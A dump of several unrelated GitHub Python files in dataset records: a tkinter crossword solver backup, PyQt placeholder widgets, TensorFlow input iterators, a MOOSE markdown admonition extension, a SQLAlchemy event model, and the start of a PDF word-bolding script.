column=0)\n self.frame_c.grid(row=1, column=1)\n self.frame_b.grid(row=1, column=2)\n \n \n def create_labels(self):\n\n # horizontal labels\n for col in range(0, self.columns):\n cell_label_h = tk.Label(self.frame_h, width=10, text=col, font = ('arial', 9, 'bold'), bg='red', border=3)\n cell_label_h.grid(row=0, column=col)\n #self.cells_dict[(0, col)] = cell\n \n # vertical labels\n for row in range(0, self.rows):\n cell_label_v = tk.Label(self.frame_v, width=3, height=5, text=row, font = ('arial', 9, 'bold'), bg='yellow', border=1)\n cell_label_v.grid(row=row, column=0)\n #self.cells_dict[(row, 0)] = cell\n \n \n def create_cells(self):\n # cells\n for row in range(0, self.rows):\n for col in range(0, self.columns):\n cell = tk.Entry(self.frame_c, width=2, textvariable = self.input_fields_arr[row][col], justify=tk.CENTER, font=('Arial', 50))\n self.cells_arr[row][col] = cell\n self.mask_dict[(row, col)] = '.'\n cell.grid(row=row, column=col)\n if self.mask_arr[row][col] == 'X':\n cell.insert(0, '$')\n cell.configure(bg=\"black\")\n self.mask_dict[(row, col)] = '$'\n \n print(f'self.mask_dict = {self.mask_dict}')\n \n \n def create_buttons(self):\n # creating a button that will fill the cells\n #self.fill_button=tk.Button(self.frame_b, text = 'Fill', command = self.fill_the_grid)\n self.fill_button=tk.Button(self.frame_b, text = 'Fill', command = lambda: self.fill_the_grid(self.dict_of_words))\n # creating a button that will call the \"quit\" function \n self.quit_button=tk.Button(self.frame_b, text = 'Quit', command = self.window.destroy)\n \n self.fill_button.pack(padx=5, pady=5, side=tk.RIGHT)\n #self.fill_button.grid(row=0, column=0)\n self.quit_button.pack(padx=5, pady=5, side=tk.RIGHT)\n \n def read_words_from_file(self, my_path):\n with open (my_path, 'r') as words:\n line = words.read()\n list_of_words = line.split('\\n')\n \n return list_of_words\n\n def convert_list_into_dict(self, list_of_words):\n dict_of_words = defaultdict(list)\n for item in list_of_words:\n dict_of_words[len(item)].append(item)\n \n return dict_of_words\n \n def all_words():\n \n all_h = [[(0,0)], [(0,4)], \n [(1,0), (1,1), (1,2)], [(1,4)],\n [(2,0)], [(2,2)], [(2,4)],\n [(3,0), (3,1), (3,2), (3,3), (3,4)]]\n all_v = [[(0,0), (1,0), (2,0), (3,0)],\n [(1,1)], [(3,1)], \n [(1,2), (2,2), (3,2)], \n [(3,3)], \n [(0,4), (1,4), (2,4), (3,4)]], \n \n\n return \n \n def words_positions(self, mask):\n # Parse the crossword\n n, m = len(mask), len(mask[0])\n mask = [list(row) for row in mask]\n \n # Find the word positions\n word_position = []\n for i in range(n):\n for j in range(m):\n if mask[i][j] == '.':\n if j == 0 or mask[i][j-1] == 'X':\n word_position.append((i, j, 'across'))\n elif i == 0 or mask[i-1][j] == 'X':\n word_position.append((i, j, 'down'))\n \n return word_position, mask\n \n # Generate possib_words for each position\n def possible_words(self, word_pos, mask, list_of_words):\n possib_words = dict()\n n, m = len(mask), len(mask[0])\n mask = [list(row) for row in mask]\n \n for i, j, direction in word_pos:\n if direction == 'across':\n length = 1\n while j+length < m and mask[i][j+length] == '.':\n length += 1\n pattern = ''.join(mask[i][j:j+length])\n else:\n length = 1\n while i+length < n and mask[i+length][j] == '.':\n length += 1\n pattern = ''.join(mask[k][j] for k in range(i, i+length))\n \n possib_words[(i, j, direction)] = [word for word in list_of_words if len(word) == length and all(word[k] == pattern[k] or \n pattern[k] == '.' for k in range(length))]\n \n #print(possib_words)\n return possib_words\n \n \n # Fill in the crossword\n def backtrack(self, mask, pos, word_position, possib_words):\n if pos == len(word_position):\n return True, mask\n i, j, direction = word_position[pos]\n for word in possib_words[(i, j, direction)]:\n if all(word[k] == mask[i][j+k] or mask[i][j+k] == '.' for k in range(len(word))):\n # Fill in the word\n for k in range(len(word)):\n mask[i][j+k] = word[k]\n # Recursively backtrack\n if self.backtrack(mask, pos+1, word_position, possib_words):\n return True, mask\n # Undo the fill\n for k in range(len(word)):\n mask[i][j+k] = '.'\n return False, mask\n \n \n def fill_the_grid(self, dict_of_words):\n '''\n mask_dict = dictionary having keys = coordinates, values = . or $\n cells_arr = array with cells (objects of class Entry)\n input_fields_arr = array with textvariables of type StringVar for reading what is written in cells (using get())\n '''\n input1 = self.input_fields_arr[0][0].get()\n print(f'self.input_fields_arr[0][0].get() = {input1}')\n \n new_word = dict_of_words[4][0].upper()\n new_word_letters = list(new_word)\n print(f'new_word_letters = {new_word_letters}')\n # for i in range(4):\n # self.cells_arr[i][0].delete(0, tk.END)\n # self.cells_arr[i][0].insert(0, new_word_letters[i])\n \n for i in range(4):\n #self.input_fields_arr[i][0].delete(0, tk.END)\n self.input_fields_arr[i][0].set(new_word_letters[i])\n \n input1 = self.input_fields_arr[0][0].get()\n print(f'self.input_fields_arr[0][0].get() = {input1}')\n \n print(f'self.cells_arr[0][1].get() = {self.cells_arr[0][1].get()}')\n print(f'self.input_fields_arr[0][1].get() = {self.input_fields_arr[0][1].get()}')\n \n \n\ndef main():\n #my_path = r'C:\\Users\\Horace.000\\eclipse-workspace\\Python_Project_6_Online_Courses\\00_ALL\\GUI\\Crosswords\\words.txt'\n #mask=['...XXXXXX', '.XXX.X...', '.....X.XX', 'XXXX.X...', 'XX...X.XX', 'XX.XXX.X.', 'X......X.', 'XX.X.XXX.', 'XXXX.....']\n mask=['.XXX.', '...X.', '.X.X.', '.....']\n #mask=['...XXXXXX', '.XXX.X...', '.....X.XX', 'XXXX.X...', 'XX...X.XX', 'XX.XXX.X.', 'X......X.', 'XX.X.XXX.', 'XXXX.....', '...XXXXXX', '.XXX.X...', '.....X.XX', 'XXXX.X...']\n \n # Create the entire GUI program\n crossword = CrosswordGrid(mask)\n \n crossword.rows, crossword.columns, crossword.mask_arr = crossword.grid_dimensions()\n print(f'mask_arr = {crossword.mask_arr}')\n print(f'rows = {crossword.rows}')\n print(f'columns = {crossword.columns}')\n \n crossword.create_frames_for_labels_and_entry_fields_and_buttons()\n crossword.create_labels()\n crossword.create_cells()\n crossword.create_buttons()\n \n list_of_words = crossword.read_words_from_file(my_path)\n \n word_position, mask = crossword.words_positions(mask)\n print(f'word_position = {word_position}')\n \n possib_words = crossword.possible_words(word_position, mask, list_of_words)\n #print(f'possib_words = {possib_words}')\n \n decision, new_mask = crossword.backtrack(mask, 0, word_position, possib_words)\n \n if decision:\n # Return the filled crossword\n result = [''.join(row) for row in new_mask]\n print(result)\n return result\n else:\n return []\n \n \n \n \n \n # Start the GUI event loop (performing an infinite loop for the window to display)\n crossword.window.mainloop()\n \n \nif __name__ == \"__main__\":\n main()\n","repo_name":"H0r4c3/Python_00_ALL","sub_path":"GUI/Crosswords/Backups/crossword_grid copy 6.py","file_name":"crossword_grid copy 6.py","file_ext":"py","file_size_in_byte":10566,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"16322097555","text":"#!/usr/bin/env python3\n'''\nA set of placeholder widgets for quick prototyping\n\nAuthor : Michael Biselx\nDate : 09.2022\nProject : PyQtTest\n'''\n\n__all__ = [\n 'PlaceHolder',\n 'DockPlaceHolder',\n 'GraphicPlaceholder',\n 'GraphicDockPlaceholder',\n 'ComplexPlaceholder'\n]\n\nimport typing\nimport numpy as np\nimport numpy.random\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom pyqtgraph import PlotItem, PlotWidget\n\n\nclass PlaceHolder(QtWidgets.QLabel):\n '''\n A simple placeholder widget\n '''\n\n def __init__(self,\n parent: typing.Optional[QtWidgets.QWidget] = None,\n flags: typing.Union[QtCore.Qt.WindowFlags, QtCore.Qt.WindowType] = QtCore.Qt.WindowType.Widget,\n *args, **kwargs) -> None:\n super().__init__(parent, flags)\n self.setWindowTitle(\"PlaceHolder\")\n self.setText(\"This is a PlaceHolder\")\n self.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.setMinimumSize(350, 50)\n\n\nclass DockPlaceHolder(QtWidgets.QDockWidget):\n '''\n A dockable placeholder widget\n '''\n\n def __init__(self,\n parent: typing.Optional[QtWidgets.QWidget] = None,\n flags: typing.Union[QtCore.Qt.WindowFlags, QtCore.Qt.WindowType] = QtCore.Qt.WindowType.Widget,\n *args, **kwargs) -> None:\n super().__init__(parent, flags)\n self.setWindowTitle(\"DockPlaceHolder\")\n self.setWidget(QtWidgets.QLabel(\n parent=self.parentWidget(),\n text=\"This is a dockable PlaceHolder\"))\n self.setContentsMargins(0, 0, 0, 0)\n\n self.setAllowedAreas(QtCore.Qt.DockWidgetArea.AllDockWidgetAreas)\n self.setMinimumSize(350, 50)\n\n if hasattr(self.parentWidget(), 'addDockWidget'):\n self.parentWidget().addDockWidget(\n QtCore.Qt.DockWidgetArea.TopDockWidgetArea, self)\n else:\n self.setFloating(True)\n self.show()\n\n\nclass RandomGraphicPlotter(PlotWidget):\n '''\n a widget which plots random values\n '''\n\n def __init__(self,\n parent=None,\n data_range=[-100, -1],\n background='default',\n plotItem: 'PlotItem|None' = None, **kargs):\n super().__init__(parent, background, plotItem, **kargs)\n\n self._data_range = data_range\n if self.plotItem is None:\n self.plotItem = PlotItem()\n self._plot = self.plotItem.plot()\n self._data = []\n self._ts = []\n self._ts0 = QtCore.QTime.currentTime().msecsSinceStartOfDay()\n\n self.startTimer(200)\n\n def timerEvent(self, event: QtCore.QTimerEvent) -> None:\n now = QtCore.QTime.currentTime().msecsSinceStartOfDay() - self._ts0\n self._ts.append(now)\n self._data.append(numpy.random.random(1)[0])\n self._plot.setData(x=np.array(self._ts[self._data_range[0]:self._data_range[1]]),\n y=np.array(self._data[self._data_range[0]:self._data_range[1]]))\n\n def sizeHint(self) -> QtCore.QSize:\n return QtCore.QSize(500, 500)\n\n\nclass GraphicPlaceholder(QtWidgets.QWidget):\n '''\n a free-standing widget for plotting random values\n '''\n\n def __init__(self,\n parent: typing.Optional[QtWidgets.QWidget] = None,\n data_range: typing.List[int] = [-100, -1],\n flags: typing.Union[QtCore.Qt.WindowFlags, QtCore.Qt.WindowType] = QtCore.Qt.WindowType.Widget,\n *args, **kwargs) -> None:\n super().__init__(parent, flags)\n self.setWindowTitle(\"GraphicPlaceholder\")\n\n self.setLayout(QtWidgets.QHBoxLayout())\n self.layout().addWidget(RandomGraphicPlotter(parent=self, data_range=data_range))\n\n self.layout().setContentsMargins(0, 0, 0, 0)\n self.layout().setSpacing(0)\n self.setContentsMargins(0, 0, 0, 0)\n\n\nclass GraphicDockPlaceholder(QtWidgets.QDockWidget):\n '''\n a dockable widget for plotting random values\n '''\n\n def __init__(self,\n parent: typing.Optional[QtWidgets.QWidget] = None,\n data_range: typing.List[int] = [-100, -1],\n flags: typing.Union[QtCore.Qt.WindowFlags, QtCore.Qt.WindowType] = QtCore.Qt.WindowType.Widget,\n *args, **kwargs) -> None:\n super().__init__(parent, flags)\n self.setWindowTitle(\"GraphicDockPlaceholder\")\n self.setWidget(RandomGraphicPlotter(parent=self,\n data_range=data_range))\n self.setContentsMargins(0, 0, 0, 0)\n\n self.setAllowedAreas(QtCore.Qt.DockWidgetArea.AllDockWidgetAreas)\n self.setMinimumSize(350, 50)\n\n if hasattr(self.parentWidget(), 'addDockWidget'):\n self.parentWidget().addDockWidget(\n QtCore.Qt.DockWidgetArea.TopDockWidgetArea, self)\n else:\n self.setFloating(True)\n self.show()\n\n\nclass ComplexPlaceholder(QtWidgets.QWidget):\n ImageDataRole = QtWidgets.QListWidgetItem.ItemType.UserType + 1\n DescriptionRole = QtWidgets.QListWidgetItem.ItemType.UserType + 2\n\n def __init__(self,\n parent: typing.Optional[QtWidgets.QWidget] = None,\n flags: typing.Union[QtCore.Qt.WindowFlags, QtCore.Qt.WindowType] = QtCore.Qt.WindowType.Widget):\n super().__init__(parent=parent, flags=flags)\n\n itemList = self._createList(['kitten', 'puppy', 'calf', 'foal'])\n itemViewer = self._createItemViewer()\n itemEditor = self._createItemEditor()\n\n itemList.itemActivated.connect(itemViewer.setActiveItem)\n itemList.itemActivated.connect(itemEditor.setActiveItem)\n itemEditor.itemEdited.connect(itemViewer.updateActiveItem)\n itemEditor.mustacheSelected.connect(itemViewer.setMustache)\n itemEditor.mustacheScale.connect(itemViewer.setMustacheScale)\n itemEditor.resetRequested.connect(itemViewer.resetImage)\n\n self.setLayout(QtWidgets.QHBoxLayout())\n self.layout().addWidget(itemList)\n self.layout().addWidget(itemViewer)\n self.layout().addWidget(itemEditor)\n\n def _createList(self, baby_animals) -> QtWidgets.QListWidget:\n '''create the list viwer sub-widget wichi contains the items'''\n from ...resources import get_path_to_img\n list = QtWidgets.QListWidget()\n for baby_animal in baby_animals:\n file_path = get_path_to_img(baby_animal + '.jpg')\n item = QtWidgets.QListWidgetItem(\n QtGui.QIcon(file_path), baby_animal)\n item.setData(self.ImageDataRole, QtGui.QImage(file_path))\n item.setData(self.DescriptionRole,\n f\"This is a cute image of a {baby_animal}.\")\n list.addItem(item)\n\n list.setMaximumWidth(300)\n\n return list\n\n def _createItemViewer(self) -> QtWidgets.QWidget:\n '''create the item viewer sub-widget'''\n viewer = QtWidgets.QWidget(self)\n\n title = QtWidgets.QLabel('image title')\n title.setProperty('title', True)\n title.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,\n QtWidgets.QSizePolicy.Policy.Maximum)\n viewer.setTitle = title.setText\n\n descr = QtWidgets.QLabel('image discription')\n descr.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,\n QtWidgets.QSizePolicy.Policy.Maximum)\n viewer.setDescription = descr.setText\n\n img = QtWidgets.QLabel('waiting for image')\n img._mustache = None\n img.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n img.minimumSizeHint = lambda: QtCore.QSize(250, 250)\n img.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding,\n QtWidgets.QSizePolicy.Policy.Expanding)\n\n def setImage(image: QtGui.QImage):\n if image.height()/img.height() > image.width()/img.width():\n i = image.scaledToHeight(img.height())\n else:\n i = image.scaledToWidth(img.width())\n\n img.setPixmap(QtGui.QPixmap.fromImage(i))\n img.sizeHint = lambda: image.size()\n viewer.setImage = setImage\n\n def resetImage():\n if viewer._activeItem is not None:\n viewer.setImage(viewer._activeItem.data(self.ImageDataRole))\n viewer.resetImage = resetImage\n\n def setActiveItem(item: QtWidgets.QListWidgetItem):\n viewer._activeItem = item\n viewer.setTitle(item.text())\n viewer.setImage(item.data(self.ImageDataRole))\n viewer.setDescription(item.data(self.DescriptionRole))\n viewer._activeItem = None\n viewer.setActiveItem = setActiveItem\n\n def updateActiveItem():\n if viewer._activeItem is not None:\n viewer.setTitle(viewer._activeItem.text())\n viewer.setImage(viewer._activeItem.data(self.ImageDataRole))\n viewer.setDescription(\n viewer._activeItem.data(self.DescriptionRole))\n viewer.updateActiveItem = updateActiveItem\n\n def resizeEvent(event: QtGui.QResizeEvent):\n if viewer._activeItem is not None:\n viewer.setImage(viewer._activeItem.data(self.ImageDataRole))\n viewer.resizeEvent = resizeEvent\n\n def setMustache(id: int):\n from ...resources import get_path_to_img\n if id > 0:\n img._mustache = QtGui.QImage(\n get_path_to_img(f'mustache{id}.png'))\n else:\n img._mustache = None\n viewer.setMustache = setMustache\n\n def setMustacheScale(scale: int):\n img._mustacheScale = scale\n img._mustacheScale = 20\n viewer.setMustacheScale = setMustacheScale\n\n def drawMustache(event: QtGui.QMouseEvent):\n if img._mustache is not None and viewer._activeItem is not None:\n m = img._mustache.scaledToWidth(\n img.pixmap().width()*img._mustacheScale//100)\n p = QtCore.QPoint(\n event.x() - m.width()//2 - (img.width() - img.pixmap().width())//2,\n event.y() - m.height()//2 - (img.height() - img.pixmap().height())//2)\n painter = QtGui.QPainter(img.pixmap())\n painter.drawImage(p, m)\n painter.end()\n img.update()\n event.accept()\n img.mousePressEvent = drawMustache\n\n viewer.setLayout(QtWidgets.QVBoxLayout())\n viewer.layout().addWidget(title)\n viewer.layout().addWidget(descr)\n viewer.layout().addWidget(img)\n\n return viewer\n\n def _createItemEditor(self) -> QtWidgets.QWidget:\n '''create the item editor sub-widget'''\n\n class Editor(QtWidgets.QWidget):\n itemEdited = QtCore.pyqtSignal()\n mustacheSelected = QtCore.pyqtSignal(int)\n mustacheScale = QtCore.pyqtSignal(int)\n resetRequested = QtCore.pyqtSignal()\n\n def __init__(self) -> None:\n super().__init__()\n\n self._activeItem: 'QtWidgets.QListWidgetItem|None' = None\n\n self.name_editor = QtWidgets.QLineEdit()\n self.name_editor.editingFinished.connect(self.editItemName)\n\n self.descr_editor = QtWidgets.QPlainTextEdit()\n self.descr_editor.keyPressEvent = self.editItemDescr\n self.descr_editor.focusOutEvent = self.editItemDescr\n\n mustaches = QtWidgets.QGroupBox('Mustaches')\n mustaches.setCheckable(True)\n mustaches.setChecked(False)\n bg = QtWidgets.QButtonGroup()\n bgl = QtWidgets.QHBoxLayout()\n for id in range(1, 3):\n rb = QtWidgets.QRadioButton(f'Mustache {id}')\n if id == 1:\n rb.setChecked(True)\n bgl.addWidget(rb)\n bg.addButton(rb, id)\n mustaches.toggled.connect(lambda active: self.mustacheSelected.emit(\n bg.checkedId()) if active else (self.resetRequested.emit(), self.mustacheSelected.emit(0)))\n bg.idClicked.connect(self.mustacheSelected.emit)\n\n scaler = QtWidgets.QSlider(QtCore.Qt.Orientation.Horizontal)\n scaler.setRange(0, 100)\n scaler.setValue(20)\n scaler.valueChanged.connect(self.mustacheScale)\n\n mustaches.setLayout(QtWidgets.QVBoxLayout())\n mustaches.layout().addLayout(bgl)\n mustaches.layout().addWidget(scaler)\n\n buttons = QtWidgets.QHBoxLayout()\n buttons.addWidget(QtWidgets.QPushButton('Does Nothing'))\n buttons.addWidget(QtWidgets.QPushButton('Also Nothing'))\n\n self.setLayout(QtWidgets.QFormLayout())\n self.layout().addRow('Name', self.name_editor)\n self.layout().addRow('Description', self.descr_editor)\n self.layout().addRow(mustaches)\n self.layout().addRow(buttons)\n self.layout().addItem(QtWidgets.QSpacerItem(0, 0,\n QtWidgets.QSizePolicy.Policy.Maximum,\n QtWidgets.QSizePolicy.Policy.Expanding))\n\n def setActiveItem(self, item: QtWidgets.QListWidgetItem):\n self._activeItem = item\n self.name_editor.setText(item.text())\n self.descr_editor.setPlainText(\n item.data(ComplexPlaceholder.DescriptionRole))\n\n def editItemName(self):\n if self._activeItem is not None:\n self._activeItem.setText(self.name_editor.text())\n self.itemEdited.emit()\n\n def editItemDescr(self, event: 'QtGui.QFocusEvent | QtGui.QKeyEvent'):\n if isinstance(event, QtGui.QKeyEvent):\n if not (event.key() == QtCore.Qt.Key.Key_Return and not event.modifiers() & QtCore.Qt.KeyboardModifier.ShiftModifier):\n # pass the keypress on the the text editor\n return QtWidgets.QPlainTextEdit.keyPressEvent(self.descr_editor, event)\n\n if self._activeItem is not None:\n self._activeItem.setData(ComplexPlaceholder.DescriptionRole,\n self.descr_editor.toPlainText())\n self.itemEdited.emit()\n\n if isinstance(event, QtGui.QFocusEvent):\n self.descr_editor.__class__.focusOutEvent(\n self.descr_editor, event)\n else:\n self.descr_editor.clearFocus()\n\n return Editor()\n","repo_name":"mbiselx/PyQtTest","sub_path":"src/PyQtTest/widgets/utils/placeholders.py","file_name":"placeholders.py","file_ext":"py","file_size_in_byte":14834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"15447702295","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport collections\n\nimport tensorflow as tf\n\nfrom . import vocab_utils\n\nCOLUMNS_TRAIN = [\"idx\", \"seq1\", \"seq2\", \"label\"]\nCOLUMNS_INFER = [\"idx\", \"seq1\", \"seq2\"]\n\nFIELD_DEFAULT_TRAIN = [[\"\"], [\"\"], [\"\"], [0]]\nFIELD_DEFAULT_INFER = [[\"\"], [\"\"], [\"\"]]\n\n\ndef _parse_line_train(line):\n fields = tf.decode_csv(line, FIELD_DEFAULT_TRAIN, field_delim=\"\\t\", use_quote_delim=False)\n columns = dict(zip(COLUMNS_TRAIN, fields))\n idx = columns.pop(\"idx\")\n seq1 = columns.pop(\"seq1\")\n seq2 = columns.pop(\"seq2\")\n label = columns.pop(\"label\")\n return idx, seq1, seq2, label\n\n\ndef _parse_line_test(line):\n fields = tf.decode_csv(line, FIELD_DEFAULT_INFER, field_delim=\"\\t\", use_quote_delim=False)\n columns = dict(zip(COLUMNS_INFER, fields))\n idx = columns.pop(\"idx\")\n seq1 = columns.pop(\"seq1\")\n seq2 = columns.pop(\"seq2\")\n return idx, seq1, seq2\n\n\nclass BatchInput(\n collections.namedtuple(\"BatchTrainInput\",\n (\"initializer\",\n \"label\", \"idx\",\n \"seq1\", \"seq1_length\",\n \"seq2\", \"seq2_length\"))):\n pass\n\n\ndef get_iterator(dataset,\n vocab_table,\n batch_size,\n random_seed=None,\n seq1_max_len=None,\n seq2_max_len=None,\n reshuffle_each_iteration=True,\n mode=\"train\"):\n dataset = dataset.map(_parse_line_train)\n\n if mode == \"train\":\n dataset = dataset.shuffle(\n 10000, random_seed, reshuffle_each_iteration)\n\n dataset = dataset.map(\n lambda idx, seq1, seq2, label: (\n idx, tf.string_split([seq1]).values, tf.string_split([seq2]).values, label))\n\n if mode == \"train\":\n # Filter zero length input sequences.\n dataset = dataset.filter(\n lambda idx, seq1, seq2, label: tf.logical_and(tf.size(seq1) > 0, tf.size(seq2) > 0))\n\n if seq1_max_len:\n dataset = dataset.map(\n lambda idx, seq1, seq2, label: (idx, seq1[:seq1_max_len], seq2, label))\n\n if seq2_max_len:\n dataset = dataset.map(\n lambda idx, seq1, seq2, label: (idx, seq1, seq2[:seq2_max_len], label))\n\n # Convert the word strings to ids. Word strings that are not in the\n # vocab get the lookup table's default_value integer.\n dataset = dataset.map(\n lambda idx, seq1, seq2, label: (\n idx,\n tf.cast(vocab_table.lookup(seq1), tf.int32),\n tf.cast(vocab_table.lookup(seq2), tf.int32),\n label))\n\n # Add in sequence lengths.\n dataset = dataset.map(\n lambda idx, seq1, seq2, label: (idx, seq1, seq2, label, tf.size(seq1), tf.size(seq2)))\n\n def batching_func(x):\n return x.padded_batch(\n batch_size,\n padded_shapes=(\n tf.TensorShape([]),\n tf.TensorShape([seq1_max_len]),\n tf.TensorShape([seq2_max_len]),\n tf.TensorShape([]),\n tf.TensorShape([]),\n tf.TensorShape([])),\n padding_values=(\n \"\",\n vocab_utils.PAD_ID,\n vocab_utils.PAD_ID,\n 0, # unused\n 0, # unused\n 0) # unused\n )\n\n batched_dataset = batching_func(dataset)\n\n batch_iter = batched_dataset.make_initializable_iterator()\n (idx, seq1_ids, seq2_ids, label, seq1_len, seq2_len) = batch_iter.get_next()\n\n return BatchInput(\n initializer=batch_iter.initializer,\n idx=idx,\n seq1=seq1_ids,\n seq2=seq2_ids,\n label=label,\n seq1_length=seq1_len,\n seq2_length=seq2_len)\n\n\ndef get_infer_iterator(dataset,\n vocab_table,\n batch_size,\n seq1_max_len=None,\n seq2_max_len=None):\n dataset = dataset.map(_parse_line_test)\n\n dataset = dataset.map(\n lambda idx, seq1, seq2: (idx, tf.string_split([seq1]).values, tf.string_split([seq2]).values))\n\n if seq1_max_len:\n dataset = dataset.map(\n lambda idx, seq1, seq2: (idx, seq1[:seq1_max_len], seq2))\n\n if seq2_max_len:\n dataset = dataset.map(\n lambda idx, seq1, seq2: (idx, seq1, seq2[:seq2_max_len]))\n\n dataset = dataset.map(\n lambda idx, seq1, seq2: (\n idx,\n tf.cast(vocab_table.lookup(seq1), tf.int32),\n tf.cast(vocab_table.lookup(seq2), tf.int32)))\n\n dataset = dataset.map(\n lambda idx, seq1, seq2: (\n idx, seq1, seq2, tf.size(seq1), tf.size(seq2)))\n\n def batching_func(x):\n return x.padded_batch(\n batch_size,\n padded_shapes=(\n tf.TensorShape([]),\n tf.TensorShape([seq1_max_len]),\n tf.TensorShape([seq2_max_len]),\n tf.TensorShape([]),\n tf.TensorShape([])),\n padding_values=(\n \"\",\n vocab_utils.PAD_ID,\n vocab_utils.PAD_ID,\n 0,\n 0))\n\n batched_dataset = batching_func(dataset)\n batch_iter = batched_dataset.make_initializable_iterator()\n (idx, seq1_ids, seq2_ids, seq1_len, seq2_len) = batch_iter.get_next()\n\n return BatchInput(\n initializer=batch_iter.initializer,\n idx=idx,\n seq1=seq1_ids,\n seq2=seq2_ids,\n seq1_length=seq1_len,\n seq2_length=seq2_len,\n label=None)\n","repo_name":"Junpliu/QAMODEL","sub_path":"QQSIM/utils/iterator_utils.py","file_name":"iterator_utils.py","file_ext":"py","file_size_in_byte":5597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40424949552","text":"import re\nfrom markdown.blockprocessors import BlockProcessor\nfrom MooseMarkdownExtension import MooseMarkdownExtension\nfrom MooseMarkdownCommon import MooseMarkdownCommon\n\nclass AdmonitionExtension(MooseMarkdownExtension):\n \"\"\"\n Extension for creating admontion (e.g, warning, errors, info, etc.).\n \"\"\"\n @staticmethod\n def defaultConfig():\n \"\"\"\n Default configuration options for SQAExtension\n \"\"\"\n config = MooseMarkdownExtension.defaultConfig()\n return config\n\n def extendMarkdown(self, md, md_globals):\n \"\"\"\n Adds components to AdmonitionExtension.\n \"\"\"\n md.registerExtension(self)\n config = self.getConfigs()\n\n md.parser.blockprocessors.add('moose_admonition',\n AdmonitionBlock(markdown_instance=md, **config),\n '_begin')\n\ndef makeExtension(*args, **kwargs): #pylint: disable=invalid-name\n \"\"\"\n Create SQAExtension\n \"\"\"\n return AdmonitionExtension(*args, **kwargs)\n\nclass AdmonitionBlock(MooseMarkdownCommon, BlockProcessor):\n \"\"\"\n Adds an admonition functionality using syntax similar to other MOOSE syntax.\n \"\"\"\n RE = re.compile(r'!admonition\\s+'\n r'(?Pinfo|note|important|warning|danger|error)\\s*' # commands\n r'(?P[^\\n]*?)' # optional title (any non newline)\n r'(?P<settings>\\w+=.*?)?' # optional settings\n r'\\n(?P<message>.*?)(?:\\Z|\\n{2,})', # message\n flags=re.DOTALL|re.MULTILINE)\n\n @staticmethod\n def defaultSettings():\n \"\"\"Settings for AdmonitionBlock\"\"\"\n settings = MooseMarkdownCommon.defaultSettings()\n return settings\n\n def __init__(self, markdown_instance=None, **kwargs):\n MooseMarkdownCommon.__init__(self, **kwargs)\n BlockProcessor.__init__(self, markdown_instance.parser)\n self.markdown = markdown_instance\n\n def test(self, parent, block):\n \"\"\"\n Check that block contains the defined RE.\n \"\"\"\n return self.RE.search(block)\n\n def run(self, parent, blocks):\n \"\"\"\n Create the collapsible region with the listed requirements.\n \"\"\"\n block = blocks.pop(0)\n match = self.RE.search(block)\n command = match.group('command')\n title = match.group('title').strip()\n message = match.group('message').strip()\n self.createAdmonition(command, message, title=title, parent=parent)\n","repo_name":"nikhilgv91/moose_nikhil","sub_path":"python/MooseDocs/extensions/admonition.py","file_name":"admonition.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42912193317","text":"import logging\nfrom pathlib import Path\nimport sqlalchemy as sa\nfrom sqlalchemy.ext.declarative import declarative_base\nimport sqlalchemy.orm as orm\n\n#-------------------------------------------------------------------------------\n\nBase = declarative_base()\n\nclass Event(Base):\n\n __tablename__ = \"events\"\n\n event_id = sa.Column(sa.Integer, primary_key=True)\n deleted = sa.Column(sa.Boolean(), nullable=False)\n user_id = sa.Column(sa.String(), nullable=False)\n start_date = sa.Column(sa.Date(), nullable=False)\n end_date = sa.Column(sa.Date(), nullable=False)\n status = sa.Column(sa.String(), nullable=False)\n notes = sa.Column(sa.String(), nullable=True)\n\n def __repr__(self):\n return (\n self.__class__.__name__\n + \"(\"\n + \", \".join( \n f\"{n}={getattr(self, n)!r}\" \n for n in (\n \"event_id\",\n \"deleted\",\n \"user_id\",\n \"start_date\",\n \"end_date\",\n \"status\",\n \"notes\",\n )\n )\n + \")\"\n )\n\n\n\n#-------------------------------------------------------------------------------\n\ndef initialize_db(db_path):\n \"\"\"\n Creates or opens the database, and sets up the model's global ORM engine.\n\n :return:\n The scoped session object.\n \"\"\"\n db_path = Path(db_path).absolute()\n logging.info(f\"using database: {db_path}\")\n engine = sa.create_engine(f\"sqlite:///{db_path}\")\n\n session = orm.scoped_session(\n orm.sessionmaker(autocommit=False, autoflush=False, bind=engine))\n\n Base.query = session.query_property()\n Base.metadata.create_all(engine)\n\n return session\n\n\n","repo_name":"alexhsamuel/coordinates","sub_path":"backend/coordinates/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38287193103","text":"from pypdf import PdfReader\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.pdfgen import canvas\nimport io\n\n\ndef read():\n reader = PdfReader(\"source.pdf\")\n text = \"\"\n\n for page_num in range(len(reader.pages)):\n text += reader.pages[page_num].extract_text()\n\n return replace_ligatures(text)\n\n\ndef write(text):\n words = text.split()\n packet = io.BytesIO()\n c = canvas.Canvas(packet, pagesize=letter)\n\n x_pos = 100\n y_pos = 750\n\n font = 'Courier'\n bold = \"Courier-Bold\"\n font_size = 12\n\n for word in words:\n half_len = len(word) // 2\n first_half = word[:half_len]\n second_half = word[half_len:]\n\n c.setFont(bold, font_size)\n c.drawString(x_pos, y_pos, first_half)\n x_pos += c.stringWidth(first_half, bold, font_size)\n\n c.setFont(font, font_size)\n c.drawString(x_pos, y_pos, second_half)\n x_pos += c.stringWidth(second_half, font, font_size) + 5\n\n # check width\n if x_pos > 500:\n x_pos = 100\n y_pos -= font_size + 5\n\n # check height\n if y_pos < 72:\n c.showPage()\n y_pos = 750\n\n c.showPage()\n c.save()\n\n 